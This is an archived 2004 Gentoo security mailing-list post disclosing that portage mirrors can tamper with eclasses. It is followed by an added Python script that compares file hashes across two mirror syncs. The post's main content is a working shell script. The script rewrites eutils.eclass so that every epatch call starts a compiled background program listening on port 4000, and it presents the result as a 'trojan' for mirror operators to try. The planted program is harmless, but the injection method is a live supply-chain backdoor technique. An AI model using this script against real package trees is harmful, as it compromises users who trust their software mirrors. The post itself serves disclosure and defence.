From: Alexander Holler
Date: Sat, 06 Nov 2004 21:16:11 +0100
To: gentoo-security@lists.gentoo.org
Subject: [gentoo-security] Trojan for Gentoo, part 2
Message-ID: <418D310B.6050106@ahsoftware.de>
Mailing-List: contact gentoo-security-help@gentoo.org; run by ezmlm

Hi,

after 1.5 years (2 years after the bug could be found in bugzilla) it seems that one of the highest security risks is closed. At least I've seen something about signed ebuilds (see http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).

Time for the next part. I've already written a bug for that a year ago, but it was now closed a second time by "the ... gatekeeper". See bug #26110.

Here's the next small script. If you are operating a gentoo mirror, or have access to one, feel free to play with it.
If you are a user, the only practical way to ensure a minimum of security is to sync twice: (a) sync, (b) delete the timestamp, (c) sync with another mirror and (d) check that no files were different, otherwise restart with (a).

----------------gentooTrojan.sh---------------------------
#!/bin/sh

if [ ${#} -ne 1 ] ; then
    echo "This script puts a silly trojan into Gentoo's portage."
    echo "Usage: `basename ${0}` PathToPortage"
    exit 1
fi

mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass

sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with telnet localhost 4000.\nKill it with killall GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass

cat >${1}/eclass/GentooTrojan.c << EOF
#include
#include
#include
#include

int main(void)
{
    struct sockaddr_in serv;
    struct sockaddr_in cli;
    int sock;

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0)
        return 1;
    bzero((char *) &serv, sizeof(serv));
    serv.sin_family = AF_INET;
    serv.sin_addr.s_addr = htonl(INADDR_ANY);
    serv.sin_port = htons(4000);
    if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
        return 1;
    if (listen(sock, 5) < 0)
        return 1;
    while (1) {
        int scli;
        int slen;
        static char *str="Your are listing to the famous Gentoo trojan!\n";
        slen = sizeof(cli);
        scli = accept(sock, (struct sockaddr *) &cli, (socklen_t *) &slen);
        write(scli, str, strlen(str));
        close(scli);
    }
}
EOF

gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c

echo "Done. Portage successfully infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo "  telnet localhost 4000"
echo "afterwards."
-------------------------------------------

Kind regards,

Alexander Holler

PS: Please don't reply to me, I don't read any Gentoo mailing lists anymore. In fact I don't even know why I'm writing this message, as I already lost every interest in Gentoo some time ago.
PPS: Sorry for those hard words, but all that reminds me of Microsoft. The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting forgotten, ignored or fixed at the same time.

PPPS: I really appreciate all the very good work on hardened gcc, selinux-profiles and so on, but for me, this all seems useless as long as the base can be compromised that easily and the user has no practical way (e.g. hashes) to check what he gets on his machine with a 'sync'.

--
gentoo-security@gentoo.org mailing list
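The two-mirror check the post describes (sync, sync again from a different mirror, verify that no files differ) and the hash-based verification it says users lack are both easy to mechanise on the client side. The following is an added example, not code from the post or from Gentoo: it hashes every regular file under a synced tree, compares the manifests of two syncs, and reports files that changed or that exist on only one mirror. The ignore list, the directory layout and the file contents in demo() are constructed for illustration; the timestamp path is only assumed to be the file the post says to delete between syncs.

```python
"""Compare two syncs of a tree (e.g. two portage mirrors) by per-file SHA-256.

Added example (not from the original post). It walks a directory, builds a
{relative_path: sha256} manifest, and diffs two manifests so that a file
altered on one mirror shows up even when the sync itself reports success.
"""
import hashlib
import os
import tempfile

# Files that legitimately differ between mirrors; path is an assumption.
IGNORED = ("metadata/timestamp",)


def file_sha256(path):
    """Stream a file through SHA-256 so large trees do not need much memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def tree_manifest(root):
    """Return {relative_posix_path: sha256hex} for every regular file under root.

    Symlinks are skipped deliberately: a dangling or redirected link should be
    reviewed by hand rather than silently hashed through.
    """
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order makes the manifest reproducible
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_sha256(full)
    return manifest


def compare_manifests(first, second, ignore=IGNORED):
    """Diff two manifests; everything not in `ignore` must match exactly."""
    keys_a = set(first) - set(ignore)
    keys_b = set(second) - set(ignore)
    return {
        "changed": sorted(p for p in keys_a & keys_b if first[p] != second[p]),
        "only_in_first": sorted(keys_a - keys_b),
        "only_in_second": sorted(keys_b - keys_a),
    }


def _write_tree(root, files):
    """Materialise a {relative_path: text} mapping on disk (test helper)."""
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)


def demo():
    """Constructed sample: sync A is clean, sync B has a modified eclass and
    an extra file; the timestamp differs but is ignored as expected."""
    clean = {
        "eclass/eutils.eclass": "epatch() {\n\tpatch -p0 < \"$1\"\n}\n",
        "metadata/timestamp": "Sat Nov  6 20:00:00 UTC 2004\n",
        "sys-apps/foo/foo-1.0.ebuild": "inherit eutils\n",
    }
    tampered = dict(clean)
    tampered["eclass/eutils.eclass"] = (
        "epatch() {\n\t# modified on one mirror\n\tpatch -p0 < \"$1\"\n}\n"
    )
    tampered["eclass/extra.eclass"] = "# file present on only one mirror\n"
    tampered["metadata/timestamp"] = "Sat Nov  6 20:30:00 UTC 2004\n"
    with tempfile.TemporaryDirectory() as tmp:
        a = os.path.join(tmp, "mirror_a")
        b = os.path.join(tmp, "mirror_b")
        _write_tree(a, clean)
        _write_tree(b, tampered)
        return compare_manifests(tree_manifest(a), tree_manifest(b))


if __name__ == "__main__":
    print(demo())
```

In practice you would run tree_manifest() against the tree after each of the two syncs the post prescribes (saving the first manifest before the second sync overwrites the files) and treat any non-empty list in the result as a reason to restart from step (a); the same manifest, once signed by the project, is exactly the "practical way (e.g. hashes)" the post asks for.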